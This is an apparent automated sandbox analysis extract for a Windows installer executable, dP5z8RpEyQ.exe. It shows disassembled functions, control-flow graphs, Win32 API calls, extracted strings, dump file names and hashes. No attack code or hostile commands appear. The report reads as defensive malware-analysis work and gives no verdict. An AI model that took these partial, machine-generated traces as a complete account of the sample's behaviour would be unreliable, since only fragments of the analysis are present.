                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 590372296-0
                                                                                                    • Opcode ID: dee1dd70bc3dae44c318a2559c0bf59ef3862208e7b388c7693d8967826c8269
                                                                                                    • Instruction ID: 684cfb1aaa76551445c09ef43b39d8f4d2da16edc43e4b0a600a882252a292b3
                                                                                                    • Opcode Fuzzy Hash: dee1dd70bc3dae44c318a2559c0bf59ef3862208e7b388c7693d8967826c8269
                                                                                                    • Instruction Fuzzy Hash: 4AA16C70900608BFDF119FA4DD89EAE7B79FB48354F00802AFA45BA1A1C7794E51DF58
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNELBASE(75923410,007A0DB8,007A0970,00405B9D,007A0970,007A0970,00000000,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00406453
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040645F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
                                                                                                    • Instruction ID: 7d3207d9493d68405b9bf293567bde81a359e03289c7d5d361232287f2b34f21
                                                                                                    • Opcode Fuzzy Hash: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
                                                                                                    • Instruction Fuzzy Hash: B7D01235504620ABC3405B78AD0C88B7A589F563313218F36F46AF12E0C6748C638ADD

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 183 403c84-403c96 184 403dd7-403de6 183->184 185 403c9c-403ca2 183->185 187 403e35-403e4a 184->187 188 403de8-403e30 GetDlgItem * 2 call 404158 SetClassLongA call 40140b 184->188 185->184 186 403ca8-403cb1 185->186 191 403cb3-403cc0 SetWindowPos 186->191 192 403cc6-403cc9 186->192 189 403e8a-403e8f call 4041a4 187->189 190 403e4c-403e4f 187->190 188->187 202 403e94-403eaf 189->202 194 403e51-403e5c call 401389 190->194 195 403e82-403e84 190->195 191->192 197 403ce3-403ce9 192->197 198 403ccb-403cdd ShowWindow 192->198 194->195 216 403e5e-403e7d SendMessageA 194->216 195->189 201 404125 195->201 203 403d05-403d08 197->203 204 403ceb-403d00 DestroyWindow 197->204 198->197 209 404127-40412e 201->209 207 403eb1-403eb3 call 40140b 202->207 208 403eb8-403ebe 202->208 212 403d0a-403d16 SetWindowLongA 203->212 213 403d1b-403d21 203->213 210 404102-404108 204->210 207->208 219 4040e3-4040fc DestroyWindow KiUserCallbackDispatcher 208->219 220 403ec4-403ecf 208->220 210->201 218 40410a-404110 210->218 212->209 214 403dc4-403dd2 call 4041bf 213->214 215 403d27-403d38 GetDlgItem 213->215 214->209 221 403d57-403d5a 215->221 222 403d3a-403d51 SendMessageA IsWindowEnabled 215->222 216->209 218->201 224 404112-40411b ShowWindow 218->224 219->210 220->219 225 403ed5-403f22 call 406167 call 404158 * 3 GetDlgItem 220->225 226 403d5c-403d5d 221->226 227 403d5f-403d62 221->227 222->201 222->221 224->201 253 403f24-403f29 225->253 254 403f2c-403f68 ShowWindow KiUserCallbackDispatcher call 40417a EnableWindow 225->254 230 403d8d-403d92 call 404131 226->230 231 403d70-403d75 227->231 232 403d64-403d6a 227->232 230->214 235 403dab-403dbe SendMessageA 231->235 237 403d77-403d7d 231->237 232->235 236 403d6c-403d6e 232->236 235->214 236->230 241 403d94-403d9d call 40140b 237->241 242 403d7f-403d85 call 40140b 237->242 241->214 250 403d9f-403da9 241->250 251 403d8b 242->251 250->251 251->230 253->254 257 403f6a-403f6b 254->257 258 403f6d 254->258 259 403f6f-403f9d GetSystemMenu EnableMenuItem SendMessageA 257->259 258->259 260 403fb2 259->260 261 403f9f-403fb0 SendMessageA 259->261 262 403fb8-403ff2 call 40418d call 403c65 call 4060d4 lstrlenA call 406167 SetWindowTextA call 401389 260->262 261->262 262->202 273 403ff8-403ffa 262->273 273->202 274 404000-404004 273->274 275 404023-404037 DestroyWindow 274->275 276 404006-40400c 274->276 275->210 277 40403d-40406a CreateDialogParamA 275->277 276->201 278 404012-404018 276->278 277->210 279 404070-4040c7 call 404158 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->202 280 40401e 278->280 279->201 285 4040c9-4040dc ShowWindow call 4041a4 279->285 280->201 287 4040e1 285->287 287->210
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC0
                                                                                                    • ShowWindow.USER32(?), ref: 00403CDD
                                                                                                    • DestroyWindow.USER32 ref: 00403CF1
                                                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0D
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403D2E
                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D42
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D49
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403DF7
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403E01
                                                                                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403E1B
                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6C
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403F12
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403F33
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F45
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F60
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F76
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F7D
                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F95
                                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FA8
                                                                                                    • lstrlenA.KERNEL32(0079F568,?,0079F568,00000000), ref: 00403FD2
                                                                                                    • SetWindowTextA.USER32(?,0079F568), ref: 00403FE1
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404115
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3282139019-0
                                                                                                    • Opcode ID: ec739e9d96bc32f6baab2395f713d9bda4e2b377654e9d8e1af96a71d6295b9f
                                                                                                    • Instruction ID: 3358382e01a0dfa2f7aaf81ce727bcb664174c2c7b1baf79b3eefcfdc57a0ccd
                                                                                                    • Opcode Fuzzy Hash: ec739e9d96bc32f6baab2395f713d9bda4e2b377654e9d8e1af96a71d6295b9f
                                                                                                    • Instruction Fuzzy Hash: 6EC1D171500200AFDB21AF25EE89D2B3AB9EB96706F00453EF641B51F1CB3D9992DB1D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 288 4038e7-4038ff call 4064dd 291 403901-403911 call 406032 288->291 292 403913-403944 call 405fbb 288->292 301 403967-403990 call 403bac call 405b5a 291->301 297 403946-403957 call 405fbb 292->297 298 40395c-403962 lstrcatA 292->298 297->298 298->301 306 403996-40399b 301->306 307 403a17-403a1f call 405b5a 301->307 306->307 308 40399d-4039c1 call 405fbb 306->308 313 403a21-403a28 call 406167 307->313 314 403a2d-403a52 LoadImageA 307->314 308->307 315 4039c3-4039c5 308->315 313->314 317 403ad3-403adb call 40140b 314->317 318 403a54-403a84 RegisterClassA 314->318 319 4039d6-4039e2 lstrlenA 315->319 320 4039c7-4039d4 call 405a97 315->320 332 403ae5-403af0 call 403bac 317->332 333 403add-403ae0 317->333 321 403ba2 318->321 322 403a8a-403ace SystemParametersInfoA CreateWindowExA 318->322 326 4039e4-4039f2 lstrcmpiA 319->326 327 403a0a-403a12 call 405a6c call 4060d4 319->327 320->319 325 403ba4-403bab 321->325 322->317 326->327 331 4039f4-4039fe GetFileAttributesA 326->331 327->307 336 403a00-403a02 331->336 337 403a04-403a05 call 405ab3 331->337 341 403af6-403b10 ShowWindow call 40646f 332->341 342 403b79-403b7a call 4052cd 332->342 333->325 336->327 336->337 337->327 349 403b12-403b17 call 40646f 341->349 350 403b1c-403b2e GetClassInfoA 341->350 345 403b7f-403b81 342->345 347 403b83-403b89 345->347 348 403b9b-403b9d call 40140b 345->348 347->333 351 403b8f-403b96 call 40140b 347->351 348->321 349->350 354 403b30-403b40 GetClassInfoA RegisterClassA 350->354 355 403b46-403b69 DialogBoxParamA call 40140b 350->355 351->333 354->355 359 403b6e-403b77 call 403837 355->359 359->325
                                                                                                    APIs
                                                                                                      • Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                                                                      • Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                                                                    • lstrcatA.KERNEL32(1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",00000000), ref: 00403962
                                                                                                    • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skittaget\lektier,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,75923410), ref: 004039D7
                                                                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 004039EA
                                                                                                    • GetFileAttributesA.KERNEL32(: Completed), ref: 004039F5
                                                                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skittaget\lektier), ref: 00403A3E
                                                                                                      • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
                                                                                                    • RegisterClassA.USER32(007A2700), ref: 00403A7B
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A93
                                                                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AC8
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403AFE
                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,007A2700), ref: 00403B2A
                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit,007A2700), ref: 00403B37
                                                                                                    • RegisterClassA.USER32(007A2700), ref: 00403B40
                                                                                                    • DialogBoxParamA.USER32(?,00000000,00403C84,00000000), ref: 00403B5F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skittaget\lektier$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                    • API String ID: 1975747703-3145436678
                                                                                                    • Opcode ID: 33a654ab319a5143a78b8400df8df2a17f9037dc0bafbe0e038c6009d0731ac5
                                                                                                    • Instruction ID: f7990f1d18b0f5a23d57c8cfe7c70d4d4c73fa70df7bf6ac8ad2bf3217d0cd4d
                                                                                                    • Opcode Fuzzy Hash: 33a654ab319a5143a78b8400df8df2a17f9037dc0bafbe0e038c6009d0731ac5
                                                                                                    • Instruction Fuzzy Hash: 29619570640640AEE610AF659D45F3B3E6CEB8574AF10413EF981B62E3DB7D9D028B2D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 362 402ea1-402eef GetTickCount GetModuleFileNameA call 405c6d 365 402ef1-402ef6 362->365 366 402efb-402f29 call 4060d4 call 405ab3 call 4060d4 GetFileSize 362->366 367 4030d1-4030d5 365->367 374 403014-403022 call 402e3d 366->374 375 402f2f 366->375 381 403024-403027 374->381 382 403077-40307c 374->382 377 402f34-402f4b 375->377 379 402f4d 377->379 380 402f4f-402f58 call 4032c7 377->380 379->380 387 40307e-403086 call 402e3d 380->387 388 402f5e-402f65 380->388 384 403029-403041 call 4032dd call 4032c7 381->384 385 40304b-403075 GlobalAlloc call 4032dd call 4030d8 381->385 382->367 384->382 409 403043-403049 384->409 385->382 413 403088-403099 385->413 387->382 391 402fe1-402fe5 388->391 392 402f67-402f7b call 405c28 388->392 399 402fe7-402fee call 402e3d 391->399 400 402fef-402ff5 391->400 392->400 411 402f7d-402f84 392->411 399->400 402 403004-40300c 400->402 403 402ff7-403001 call 406594 400->403 402->377 412 403012 402->412 403->402 409->382 409->385 411->400 415 402f86-402f8d 411->415 412->374 416 4030a1-4030a6 413->416 417 40309b 413->417 415->400 418 402f8f-402f96 415->418 419 4030a7-4030ad 416->419 417->416 418->400 420 402f98-402f9f 418->420 419->419 421 4030af-4030ca SetFilePointer call 405c28 419->421 420->400 422 402fa1-402fc1 420->422 424 4030cf 421->424 422->382 425 402fc7-402fcb 422->425 424->367 426 402fd3-402fdb 425->426 427 402fcd-402fd1 425->427 426->400 428 402fdd-402fdf 426->428 427->412 427->426 428->400
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00402EB2
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\dP5z8RpEyQ.exe,00000400), ref: 00402ECE
                                                                                                      • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405C71
                                                                                                      • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dP5z8RpEyQ.exe,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00402F1A
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                                                    Strings
                                                                                                    • Inst, xrefs: 00402F86
                                                                                                    • soft, xrefs: 00402F8F
                                                                                                    • Null, xrefs: 00402F98
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                                                                                    • Error launching installer, xrefs: 00402EF1
                                                                                                    • "C:\Users\user\Desktop\dP5z8RpEyQ.exe", xrefs: 00402EA1
                                                                                                    • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                                                                                                    • C:\Users\user\Desktop\dP5z8RpEyQ.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                    • String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\dP5z8RpEyQ.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                    • API String ID: 2803837635-940839292
                                                                                                    • Opcode ID: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
                                                                                                    • Instruction ID: e6d4fb369877e8ee952de7074d12315c12307524423d8dbd5c49f4dc18488fa3
                                                                                                    • Opcode Fuzzy Hash: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
                                                                                                    • Instruction Fuzzy Hash: 3151D271901208AFDF20AF65DD85B6E7AB8EB04755F10813BF500B22D6D77C9E818B9D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 429 406167-406172 430 406174-406183 429->430 431 406185-40619b 429->431 430->431 432 4061a1-4061ac 431->432 433 40638c-406390 431->433 432->433 436 4061b2-4061b9 432->436 434 406396-4063a0 433->434 435 4061be-4061c8 433->435 438 4063a2-4063a6 call 4060d4 434->438 439 4063ab-4063ac 434->439 435->434 437 4061ce-4061d5 435->437 436->433 440 4061db-40620f 437->440 441 40637f 437->441 438->439 443 406215-40621f 440->443 444 40632c-40632f 440->444 445 406381-406387 441->445 446 406389-40638b 441->446 447 406221-406225 443->447 448 406239 443->448 449 406331-406334 444->449 450 40635f-406362 444->450 445->433 446->433 447->448 451 406227-40622b 447->451 454 406240-406247 448->454 452 406344-406350 call 4060d4 449->452 453 406336-406342 call 406032 449->453 455 406370-40637d lstrlenA 450->455 456 406364-40636b call 406167 450->456 451->448 458 40622d-406231 451->458 467 406355-40635b 452->467 453->467 460 406249-40624b 454->460 461 40624c-40624e 454->461 455->433 456->455 458->448 463 406233-406237 458->463 460->461 465 406250-40626b call 405fbb 461->465 466 406287-40628a 461->466 463->454 475 406270-406273 465->475 468 40629a-40629d 466->468 469 40628c-406298 GetSystemDirectoryA 466->469 467->455 471 40635d 467->471 473 40630a-40630c 468->473 474 40629f-4062ad GetWindowsDirectoryA 468->474 472 40630e-406311 469->472 476 406324-40632a call 4063af 471->476 472->476 477 406313-406317 472->477 473->472 479 4062af-4062b9 473->479 474->473 475->477 480 406279-406282 call 406167 475->480 476->455 477->476 482 406319-40631f lstrcatA 477->482 484 4062d3-4062e9 SHGetSpecialFolderLocation 479->484 485 4062bb-4062be 479->485 480->472 482->476 488 406307 484->488 489 4062eb-406305 SHGetPathFromIDListA CoTaskMemFree 484->489 485->484 487 4062c0-4062c7 485->487 490 4062cf-4062d1 487->490 488->473 489->472 489->488 490->472 490->484
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00406292
                                                                                                    • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,subterritories,00000000,00405233,subterritories,00000000), ref: 004062A5
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405233,759223A0,?,subterritories,00000000,00405233,subterritories,00000000), ref: 004062E1
                                                                                                    • SHGetPathFromIDListA.SHELL32(759223A0,: Completed), ref: 004062EF
                                                                                                    • CoTaskMemFree.OLE32(759223A0), ref: 004062FB
                                                                                                    • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631F
                                                                                                    • lstrlenA.KERNEL32(: Completed,?,subterritories,00000000,00405233,subterritories,00000000,00000000,00799A22,759223A0), ref: 00406371
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                    • String ID: : Completed$Haste.n$$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$subterritories
                                                                                                    • API String ID: 717251189-1336606996
                                                                                                    • Opcode ID: e6c4a9fbb4c321ecebe7d36b76985c5b159c9a2176219b4b87ef98d85bb8a455
                                                                                                    • Instruction ID: 6e1ed981659f24e818377f3a16580b7a42bd992c39e8c3c65ac9697aa82fb6a7
                                                                                                    • Opcode Fuzzy Hash: e6c4a9fbb4c321ecebe7d36b76985c5b159c9a2176219b4b87ef98d85bb8a455
                                                                                                    • Instruction Fuzzy Hash: C861E571900210AEEB149F28DC94BBE7BA49B46314F12413FED43B62D1D73C4961CB9E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
